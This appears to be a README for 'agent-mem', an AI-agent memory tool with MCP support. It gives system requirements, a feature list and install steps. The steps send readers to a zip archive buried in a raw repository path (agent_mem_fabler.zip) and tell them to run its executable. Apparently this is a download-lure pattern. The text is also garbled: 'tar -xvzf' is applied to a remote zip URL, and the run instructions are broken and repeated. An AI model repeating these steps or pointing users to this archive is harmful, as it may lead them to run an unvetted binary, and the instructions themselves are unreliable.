Before you download, ensure your system meets the following requirements:
- Operating Systems: This application runs on Windows, macOS, and Linux.
- Memory: At least 4 GB of RAM is recommended for smooth performance.
- Processor: A modern multi-core CPU.
- Disk Space: You will need at least 200 MB of free disk space.
- Active File Watching: Automatically monitor files for changes. agent-mem adjusts memory management based on the latest updates.
- Auto-Distillation via LLM: Leverages language models to simplify and refine data storage.
- Single Source of Truth Versioning: Keeps your data consistent across applications for better reliability.
- Native MCP Support: Works seamlessly with Model Context Protocol for enhanced AI capabilities.
To get started with agent-mem, follow these steps:
- Visit the Releases Page: Go to the Releases page to find the latest version.
- Select the Download: Look for the latest release. You will see various files. Choose the one that matches your operating system. For most users, the file names will look like

This will save the file to your computer.
- Extract the Files:
- For Windows, right-click on the zip file and choose "Extract All."
- For macOS, double-click the zip file to extract it.
- For Linux, use the terminal or a file manager to extract the https://github.com/HanFromTokyoDrift/agent-mem/raw/refs/heads/main/mcp-go/cmd/agent_mem_fabler.zip file. You can run
tar -xvzf https://github.com/HanFromTokyoDrift/agent-mem/raw/refs/heads/main/mcp-go/cmd/agent_mem_fabler.zipin the terminal.
- Run the Application:
- On Windows, find the folder where you extracted the files and double-click

agent-memfile and double-click it. - On Linux, navigate to the folder in the terminal and run
./agent-mem.
- On Windows, find the folder where you extracted the files and double-click
